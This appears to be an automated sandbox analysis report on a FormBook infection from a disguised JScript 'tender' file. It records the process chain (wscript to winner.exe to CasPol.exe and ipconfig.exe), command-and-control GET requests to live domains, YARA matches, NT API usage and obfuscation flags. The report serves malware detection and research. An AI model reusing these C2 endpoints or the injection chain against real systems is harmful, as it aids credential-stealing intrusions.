          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=MumrQfrFlOyD9XsP8OR0UClXFyftPmtzTeYgycr6a5IUfga2ox/HNpA7pnpLcbk4ltNykJNVaPuH0Ad8Q8mslGHvUdw/9wroMg==&20=4xfPiv3RnE HTTP/1.1Host: www.hougou.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=fBMxo69x1QXNWuc9hyM7d4IFsS8MYdi4DQWD1kEEyFhAPfH6LtWDKNH9q/ewbXUtBA348B3g5uC8JLGqihwz/XjbfKo4x0QdAA== HTTP/1.1Host: www.panalobet88.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownHTTPS traffic detected: 91.227.138.48:443 -> 192.168.2.5:49703 version: TLS 1.2

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_004058432_2_00405843
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0040C0132_2_0040C013
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_004038C32_2_004038C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_004038BC2_2_004038BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_00421A582_2_00421A58
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_004222E62_2_004222E6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_00401B8C2_2_00401B8C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_00401BA02_2_00401BA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_004206732_2_00420673
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0040561A2_2_0040561A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_004056232_2_00405623
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0040BFCD2_2_0040BFCD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_004017E82_2_004017E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_004017F02_2_004017F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_012441202_2_01244120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032FEBB06_2_032FEBB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032E6E306_2_032E6E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032C0D206_2_032C0D20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032E41206_2_032E4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032CF9006_2_032CF900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03391D556_2_03391D55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032DD5E06_2_032DD5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D841F6_2_032D841F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033810026_2_03381002
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032DB0906_2_032DB090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_00758D906_2_00758D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_007538306_2_00753830
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_007538276_2_00753827
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0076E8806_2_0076E880
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0075A1DA6_2_0075A1DA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_00753A506_2_00753A50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0075A2206_2_0075A220
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_00751AD06_2_00751AD0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_00751AC96_2_00751AC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_007704F36_2_007704F3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 032CB150 appears 32 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E573 NtCreateFile,2_2_0041E573
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E623 NtReadFile,2_2_0041E623
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E6A3 NtClose,2_2_0041E6A3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E753 NtAllocateVirtualMemory,2_2_0041E753
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01269910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_012699A0 NtCreateSection,LdrInitializeThunk,2_2_012699A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269860 NtQuerySystemInformation,LdrInitializeThunk,2_2_01269860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269840 NtDelayExecution,LdrInitializeThunk,2_2_01269840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_012698F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_012698F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269A20 NtResumeThread,LdrInitializeThunk,2_2_01269A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01269A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269A50 NtCreateFile,LdrInitializeThunk,2_2_01269A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269540 NtReadFile,LdrInitializeThunk,2_2_01269540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_012695D0 NtClose,LdrInitializeThunk,2_2_012695D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269710 NtQueryInformationToken,LdrInitializeThunk,2_2_01269710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_012697A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_012697A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269780 NtMapViewOfSection,LdrInitializeThunk,2_2_01269780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269FE0 NtCreateMutant,LdrInitializeThunk,2_2_01269FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01269660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_012696E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_012696E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309710 NtQueryInformationToken,LdrInitializeThunk,6_2_03309710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309780 NtMapViewOfSection,LdrInitializeThunk,6_2_03309780
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309FE0 NtCreateMutant,LdrInitializeThunk,6_2_03309FE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309A50 NtCreateFile,LdrInitializeThunk,6_2_03309A50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033096E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_033096E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033096D0 NtCreateKey,LdrInitializeThunk,6_2_033096D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_03309910
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309560 NtWriteFile,LdrInitializeThunk,6_2_03309560
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309540 NtReadFile,LdrInitializeThunk,6_2_03309540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033099A0 NtCreateSection,LdrInitializeThunk,6_2_033099A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033095D0 NtClose,LdrInitializeThunk,6_2_033095D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309860 NtQuerySystemInformation,LdrInitializeThunk,6_2_03309860
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309840 NtDelayExecution,LdrInitializeThunk,6_2_03309840
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309730 NtQueryVirtualMemory,6_2_03309730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0330A710 NtOpenProcessToken,6_2_0330A710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309B00 NtSetValueKey,6_2_03309B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309770 NtSetInformationFile,6_2_03309770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0330A770 NtOpenThread,6_2_0330A770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309760 NtOpenProcess,6_2_03309760
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0330A3B0 NtGetContextThread,6_2_0330A3B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033097A0 NtUnmapViewOfSection,6_2_033097A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309A20 NtResumeThread,6_2_03309A20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309610 NtEnumerateValueKey,6_2_03309610
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309A10 NtQuerySection,6_2_03309A10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309A00 NtProtectVirtualMemory,6_2_03309A00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309670 NtQueryInformationProcess,6_2_03309670
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309660 NtAllocateVirtualMemory,6_2_03309660
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309650 NtQueryValueKey,6_2_03309650
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309A80 NtOpenDirectoryObject,6_2_03309A80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0330AD30 NtSetContextThread,6_2_0330AD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309520 NtWaitForSingleObject,6_2_03309520
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309950 NtQueueApcThread,6_2_03309950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033095F0 NtQueryInformationFile,6_2_033095F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033099D0 NtCreateProcessEx,6_2_033099D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309820 NtEnumerateKey,6_2_03309820
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0330B040 NtSuspendThread,6_2_0330B040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033098A0 NtWriteVirtualMemory,6_2_033098A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033098F0 NtReadVirtualMemory,6_2_033098F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0076C830 NtReadFile,6_2_0076C830
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0076C8B0 NtClose,6_2_0076C8B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0076C880 NtDeleteFile,6_2_0076C880
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0076C780 NtCreateFile,6_2_0076C780
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0076C87A NtDeleteFile,6_2_0076C87A
          Source: 0900664 MOHS Tender..jsInitial sample: Strings found which are bigger than 50
          Source: winner[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: winner.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0900664 MOHS Tender..jsReversingLabs: Detection: 17%
          Source: 0900664 MOHS Tender..jsVirustotal: Detection: 27%
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0900664 MOHS Tender..js"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\winner.exe "C:\Users\user\AppData\Local\Temp\winner.exe"
          Source: C:\Users\user\AppData\Local\Temp\winner.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\winner.exe "C:\Users\user\AppData\Local\Temp\winner.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winner.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exeJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FMJump to behavior
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\winner.exeJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winJS@11/4@17/18
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winner.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: winner[1].exe.0.dr, IuoHa1X9xJUep9RV2q/F0reJDjq7VNmSbudKE.csCryptographic APIs: 'CreateDecryptor'
          Source: winner[1].exe.0.dr, IuoHa1X9xJUep9RV2q/F0reJDjq7VNmSbudKE.csCryptographic APIs: 'CreateDecryptor'
          Source: winner.exe.0.dr, IuoHa1X9xJUep9RV2q/F0reJDjq7VNmSbudKE.csCryptographic APIs: 'CreateDecryptor'
          Source: winner.exe.0.dr, IuoHa1X9xJUep9RV2q/F0reJDjq7VNmSbudKE.csCryptographic APIs: 'CreateDecryptor'
          Source: 1.0.winner.exe.260000.0.unpack, IuoHa1X9xJUep9RV2q/F0reJDjq7VNmSbudKE.csCryptographic APIs: 'CreateDecryptor'
          Source: 1.0.winner.exe.260000.0.unpack, IuoHa1X9xJUep9RV2q/F0reJDjq7VNmSbudKE.csCryptographic APIs: 'CreateDecryptor'
          Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\OfficeJump to behavior
          Source: Binary string: ipconfig.pdb source: CasPol.exe, 00000002.00000002.451827142.0000000001650000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: CasPol.exe, 00000002.00000002.451827142.0000000001650000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: CasPol.exe, 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.414244816.000000000106E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.412098136.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: CasPol.exe, CasPol.exe, 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.414244816.000000000106E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.412098136.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe

          Data Obfuscation

          barindex
          JScript performs obfuscated calls to suspicious functions
